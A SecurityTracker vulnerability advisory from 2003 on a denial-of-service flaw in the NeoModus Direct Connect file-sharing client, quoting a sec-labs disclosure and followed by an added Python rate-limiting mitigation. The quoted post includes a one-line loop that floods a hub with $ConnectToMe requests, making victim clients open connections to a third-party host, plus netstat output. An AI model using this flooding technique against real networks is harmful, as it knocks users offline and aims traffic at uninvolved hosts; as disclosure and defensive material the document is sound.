SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   Direct Connect
Vendors:   NeoModus
NeoModus Direct Connect Permits Remote Denial of Service Attacks
SecurityTracker Alert ID:  1007186
SecurityTracker URL:  http://securitytracker.com/id/1007186
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 14 2003
Impact:   Denial of service via network

Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
Description:   A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.

sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host with a command of the following format:

$ConnectToMe <U's username> <D's IP and port>|

This will reportedly cause denial of service conditions on the target user's system.

Only the Windows version was tested.

Impact:   A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.neo-modus.com/
Cause:   Resource error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Only the Windows version was tested

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus



     sec-labs team proudly presents:
     
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably newest version.	  
     by Lord YuP
     13/07/2003



   I. BACKGROUND

     Direct Connect is a Windows (I've found also a Linux version but
     I don't have time to test it) p2p file-sharing program, well 
     common nowadays.


   II. DESCRIPTION


     According to aDe, the DC Client to Client HandShake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 
	---------------------------------------------------------- 

	ACTIVE FILE DOWNLOAD 
	---------------------- 
	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)


     As u can guess, the Direct Connect client after receiving
     "$ConnectToMe..." command from hub, tries to connect to 
     specific IP and PORT sent by the Downloader.

     The attacker (evil-downloader) can send infinite requests
     to HUB with specific marked ip:port causing DoS attack 
     in the Victim's client. 

     Little example:
     
     Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }

     Client: (ran "netstat -a")
     

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


   III. IMPACT

     The attacked client may be DoS-ed in case of that internet connection
     can be reset/stopped, some clients may flood with the "Out of Memory"
     msgboxes in case of that, system may be not working correctly, and DC
     client may be terminated.



-- 
sec-labs team [http://sec-labs.hack.pl]
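
A client-side mitigation for the behaviour reported above, as an added example (not code from the advisory, sec-labs or NeoModus): hub-relayed `$ConnectToMe` commands are parsed and passed through a limiter before the client opens any outbound connection. The class and function names, the thresholds and the sample traffic are assumptions made for illustration.

```python
import re
from collections import deque
# Command format from the advisory: $ConnectToMe <U's username> <D's IP and port>|
CONNECT_RE = re.compile(r"^\$ConnectToMe (\S+) ([^\s:|]+):(\d{1,5})$")

def parse_connect_to_me(command):
    """Return (nick, host, port) for a well-formed command, else None."""
    m = CONNECT_RE.match(command)
    if not m or not 1 <= int(m.group(3)) <= 65535:
        return None
    return m.group(1), m.group(2), int(m.group(3))

class ConnectToMeGate:
    """Hypothetical client-side limiter applied before any outbound connect."""
    def __init__(self, max_per_window=5, window_s=10.0, max_pending=10):
        self.max_per_window, self.window_s = max_per_window, window_s
        self.max_pending = max_pending
        # recent: times of requests acted on; pending: connects in progress
        self.recent, self.pending = deque(), set()

    def allow(self, host, port, now):
        while self.recent and now - self.recent[0] >= self.window_s:
            self.recent.popleft()
        if ((host, port) in self.pending
                or len(self.recent) >= self.max_per_window
                or len(self.pending) >= self.max_pending):
            return False
        self.recent.append(now)
        self.pending.add((host, port))
        return True

    def finished(self, host, port):
        self.pending.discard((host, port))

def filter_hub_stream(data, gate, start=0.0, step=0.01):
    """Split hub data on '|'; return (allowed targets, dropped count)."""
    allowed, dropped = [], 0
    for i, cmd in enumerate(c for c in data.split("|") if c):
        parsed = parse_connect_to_me(cmd)
        if parsed is None:
            continue  # other hub commands are not this gate's concern
        _, host, port = parsed
        if gate.allow(host, port, start + i * step):
            allowed.append((host, port))
        else:
            dropped += 1
    return allowed, dropped

# Constructed sample: 200 relayed requests 10 ms apart (TEST-NET address).
SAMPLE = "".join("$ConnectToMe alice 192.0.2.10:%d|" % p for p in range(2000, 2200))
print(filter_hub_stream(SAMPLE, ConnectToMeGate()))
```

With the default thresholds the client acts on only the first five requests in the burst; the caller reports completed or failed connects through `finished()` so the pending cap reflects sockets that are actually open.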





 
 



Copyright 2021, SecurityGlobal.net LLC